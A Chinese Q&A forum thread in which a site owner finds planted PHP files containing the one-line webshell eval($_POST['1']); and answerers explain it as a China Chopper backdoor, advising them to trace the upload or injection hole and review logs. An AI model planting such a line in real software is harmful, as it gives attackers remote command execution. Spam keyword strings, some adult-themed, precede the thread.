第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

為了賬號(hào)安全,請(qǐng)及時(shí)綁定郵箱和手機(jī)立即綁定
已解決430363個(gè)問(wèn)題,去搜搜看,總會(huì)有你想問(wèn)的

網(wǎng)站多了幾個(gè)PHP文件,eval($_POST['1']);

網(wǎng)站多了幾個(gè)PHP文件,eval($_POST['1']);

哈士奇WWW 2019-04-08 11:18:36
網(wǎng)站多了幾個(gè)PHP,內(nèi)容如下:eval($_POST['1']);有的是其他內(nèi)容,我百度了一下發(fā)現(xiàn)時(shí)執(zhí)行某些命令的,我測(cè)試了一下如果權(quán)限沒(méi)限制好的話確實(shí)可以執(zhí)行一些命令。請(qǐng)問(wèn)除了設(shè)置權(quán)限,從代碼級(jí)別可否做限制呢?有沒(méi)有什么好辦法呢?還有個(gè)PHP文件內(nèi)容如下:還有文件,名字是:13686921256303.virus_killed內(nèi)容是:請(qǐng)各位出出注意,謝謝了。
查看完整描述

2 回答

?
函數(shù)式編程

TA貢獻(xiàn)1807條經(jīng)驗(yàn) 獲得超9個(gè)贊

明顯的是被上傳一句話木馬了?。】梢酝ㄟ^(guò)菜刀直接連接的,可以執(zhí)行很多命令。修復(fù)的話要從根本上修復(fù),看下網(wǎng)站是不是有上傳漏洞,sql注入等問(wèn)題??梢圆榭磆ttp的訪問(wèn)日志來(lái)看利用這個(gè)一句話執(zhí)行了什么操作,排查網(wǎng)站是不是被提權(quán),獲取了服務(wù)器權(quán)限等。
                            
查看完整回答
反對(duì) 回復(fù) 2019-04-08
?
Smart貓小萌

TA貢獻(xiàn)1911條經(jīng)驗(yàn) 獲得超7個(gè)贊

修正要修正根上。
與其費(fèi)心讓病毒代碼“不能運(yùn)行”,倒不如尋找病毒進(jìn)入的來(lái)源——是從PHP程序的漏洞引入的,還是從服務(wù)器環(huán)境的不安全引入的。
另外提一下,使用虛擬主機(jī)在安全性上可能不是一個(gè)好主意。因?yàn)槟闩c他人分享不隔離的物理設(shè)備與LAMP環(huán)境,雖然理論上Linux下用戶之間的隔離很好,但實(shí)際上不隔離開(kāi)還是風(fēng)險(xiǎn)很高。
                            
查看完整回答
反對(duì) 回復(fù) 2019-04-08
  • 2 回答
  • 0 關(guān)注
  • 347 瀏覽
慕課專欄
更多

添加回答

舉報(bào)

0/150
提交
取消
微信客服

購(gòu)課補(bǔ)貼
聯(lián)系客服咨詢優(yōu)惠詳情

幫助反饋 APP下載

慕課網(wǎng)APP
您的移動(dòng)學(xué)習(xí)伙伴

公眾號(hào)

掃描二維碼
關(guān)注慕課網(wǎng)微信公眾號(hào)